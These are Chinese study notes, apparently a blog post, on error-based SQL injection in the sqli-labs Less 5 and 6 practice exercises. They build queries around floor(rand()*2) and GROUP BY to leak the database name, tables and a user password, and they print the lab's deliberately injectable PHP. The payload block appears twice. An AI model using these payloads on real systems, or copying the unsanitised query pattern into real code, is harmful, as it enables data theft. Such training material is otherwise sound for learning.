Less 5&6
来源:互联网 发布:扎克伯格起诉社交网络 编辑:程序博客网 时间:2024/06/15 04:58
在5内报错信息
' '1' ' LIMIT 0,1 '
select *from table where id = 'input';
基于错误的注入
count () 统计元祖的个数
rand() 0-1中随机数;
floor()向下取整;
group by()‘’
select group_concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name;
select group_concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables;
select concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables;
select concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name//name 指的是concat() 即为database1或2;
select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name
select count(*),concat(0x3a,0x3a,version(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name
id=1'and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 1,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
bugs.mysql.com/bug.php?id=32249
' '1' ' LIMIT 0,1 '
select *from table where id = 'input';
基于错误的注入
count () 统计元祖的个数
rand() 0-1中随机数;
floor()向下取整;
group by()‘’
select group_concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name;
select group_concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables;
select concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables;
select concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name//name 指的是concat() 即为database1或2;
select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name
select count(*),concat(0x3a,0x3a,version(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name
id=1'and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 1,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
bugs.mysql.com/bug.php?id=32249
这个注入是基于MySQL本身的bug : select count(*),floor(rand()*2) x from grouptest1 group by x;
<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo '<font size="5" color="#FFFF00">'; echo 'You are in...........'; echo "<br>"; echo "</font>"; }else {echo '<font size="3" color="#FFFF00">';print_r(mysql_error());echo "</br></font>";echo '<font color= "#0000ff" font size= 3>';}}else { echo "Please input the ID as parameter with numeric value";}?>
0 0
- sqli-labs ---- Less-5 & Less-6
- Less 5&6
- less
- less
- LESS
- less
- less
- less
- less
- less
- LESS
- less
- less
- less
- Less
- LESS
- Less
- Less
- Python csv模块的使用
- E
- 同步与异步的概念
- 容器操作
- 通过VC++和OpenGL显示STL文件
- Less 5&6
- Mac+Sublime3+Python
- 【IMWeb训练营作业】Stock-trade
- MySQL输入密码后闪退(jbdc连接异常)
- shell学习——基础知识
- 字符编码笔记:ASCII,Unicode和UTF-8
- java8中map的新方法--replace
- 语义化版本
- 第二篇